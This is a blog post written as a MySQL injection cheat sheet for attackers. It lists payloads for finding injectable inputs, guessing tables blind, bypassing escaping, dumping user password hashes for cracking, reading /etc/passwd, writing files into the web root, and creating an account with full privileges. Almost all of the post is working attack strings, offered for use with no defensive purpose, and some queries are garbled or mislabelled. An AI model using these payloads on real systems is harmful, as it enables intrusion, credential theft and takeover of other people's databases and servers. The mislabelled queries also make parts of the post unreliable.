mySQL Injection Cheat Sheet

This cheat sheet is only for those who understand how SQL Injection attack works, yet doesn't really care to memorize all the semantic and syntactic of the queries.

If you don't know what SQL Injection is, skip this post. If you insist to read, please go and read about SQL Injection first.

Image from lastwatchdog.com

Blind SQL Injection

When you're trying to enumerate, it's good to try both with and without encapsulation;

Without:

1 OR 1=1

With:

1' OR '1'='1 

To see if the database is handling encapsulation correctly, just throw a blind SQL

1'1

and the error will tell you about encapsulation handling


Or you can use blind with EXEC

1 EXEC SP_ (or EXEC XP_)

Then to check the SQL filtering, throw these two

1

1 AND 1=1 

If both give the same result, it means filtering is not there, and the database is vulnerable


 To find table names with blind injection, you have to guess the name yourself and hope for a hit. It will easier to write a script to do this for you, or use one of those blind SQL injection software available, but the basic query is

1' AND 1=(SELECT COUNT(*) FROM table_name); --

table_name is the one you should be guessing


Now, it is also important to know whether the user you're masquerading as has the admin privilege

 1 AND USER_NAME() = 'dbo'

You will see why this is important later

If the database is has filtering enable with mysql_real_escape_string() , then you can try cancelling it out using backslash

\'; your-query-here; --

1\'1 

One of the main point of doing a blind SQL injection attack is to force error in the query response. One way can be done by asking for a table that does not exist

1' AND fake_table_name = '1

Most (not all) database has a table called username (blame it on the web developer), so that is one less table name you have to guess. Just try to dump all the user names from the database. Try with users and <system_name>_users as well

' OR username IS NOT NULL OR username = '

If you're lucky, you don't have to do blind injection.
Dumping SQL tables

To see the SQL version

SELECT @@version

 Current user

SELECT user();
SELECT system_user();

If you get a user with admin privilege, then roll on!

List all database users (not system users!)

SELECT user FROM mysql.user;

List hash password for database users

SELECT host, user, password FROM mysql.user;

Then, use a password cracker software to crack those hashes. John the Ripper is a good one


Now, you will want to dump all privileges in the databases

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

Or dump DBA accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’;

See current database

SELECT database()

 See all databases

SELECT database()

See columns

 SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

See tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

Find table by a column's name. For example you want to find a table with a column called username

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; 

Select by row number.

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; 
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1;

To avoid quotes, use hexadecimal value instead

SELECT 0×414243

Read local file. For example, /etc/passwd hahaha

’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’)

Write to local file

 SELECT * FROM mytable INTO dumpfile ‘/opt/lampp/htdocs/newindex.php’;

Get Hostname and IP address

SELECT @@hostname;

Create a new user

CREATE USER newuser IDENTIFIED BY ‘pass1′;

Delete existing user

 DROP USER olduser;

Make user a database admin (DBA)... wheeeeee~

 GRANT ALL PRIVILEGES ON *.* TO newuser@’%';

Get location of database file

SELECT @@datadir;

Okay, I think that's enough... too much is never good.

Posted by Posted by Ariff Abdullah , on at 11:31 • Labels: geek, hacking, L